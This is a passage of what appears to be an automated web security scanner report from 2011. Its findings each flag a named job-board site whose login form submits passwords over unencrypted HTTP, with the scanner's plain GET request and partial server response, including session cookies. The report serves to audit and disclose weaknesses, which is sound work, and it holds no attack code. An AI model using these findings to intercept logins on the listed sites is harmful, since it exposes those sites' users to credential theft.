Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m7mcbdpiiljbvgpgqr9pv8mf76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108598

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.planningcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.89. http://www.postdoctoralfellowcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.postdoctoralfellowcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.postdoctoralfellowcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4oc28cbo738q50s3ji82u7eki6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102645

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.postdoctoralfellowcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.90. http://www.prcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.prcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:35 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=b4uv8543vsma7m3i4v2d0i48g1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:35 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120302

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.prcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.91. http://www.preferredresumes.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.preferredresumes.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.preferredresumes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:29 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=tig2sucmmp7tj371vs9tftefe3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83027

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
   <title>Resume Writing Services, Professional Resume Writing, Cover Letter Writing
...[SNIP]...
</script>

<form name="formlogin" action="/index.php" method="POST" onsubmit="return Login()">
<input type=hidden name="clslogin_hdnaction" id="clslogin_hdnaction" value="">
...[SNIP]...
<td align="right"><input type="Password" name="clslogin_password" size="25" class="inputbox" onfocus="focusval(this.value,'Password')" onblur="blurval('Password')" value="Password"></td>
...[SNIP]...

6.92. http://www.procurementcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.procurementcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.procurementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mr66qa0ivqt5goom135g89nlu2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101019

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.procurementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.93. http://www.productmanagercrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.productmanagercrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.productmanagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:48 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=l5s6qlvjn27hh7eesjabq2c214; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:48 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106086

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.productmanagercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.94. http://www.projectmanagementcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.projectmanagementcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.projectmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=k77p330j68s603hksj5he5k7t6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119200

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.projectmanagementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.95. http://www.publicinterestcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publicinterestcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.publicinterestcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d0md3kboqphlouu186urplhea4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104328

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.publicinterestcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.96. http://www.publishingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.publishingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=hjafrla8sm0vjpuuvbsqohvh76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114373

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.publishingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.97. http://www.purchasingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.purchasingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.purchasingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jp7jhr7hfsn4u1q0tf9pujn7l0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105391

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.purchasingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.98. http://www.qaqccrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.qaqccrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.qaqccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:53 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2cvnjstpd6ib3smaikg60ai1v0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120361

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.qaqccrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.99. http://www.radiocrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.radiocrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.radiocrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=beoah5h5h42a821e8g7r1l0ko5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113112

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.radiocrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.100. http://www.realestateandlandcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.realestateandlandcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.realestateandlandcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:57 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=om23b647f73v2jeihjo6qjanv4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
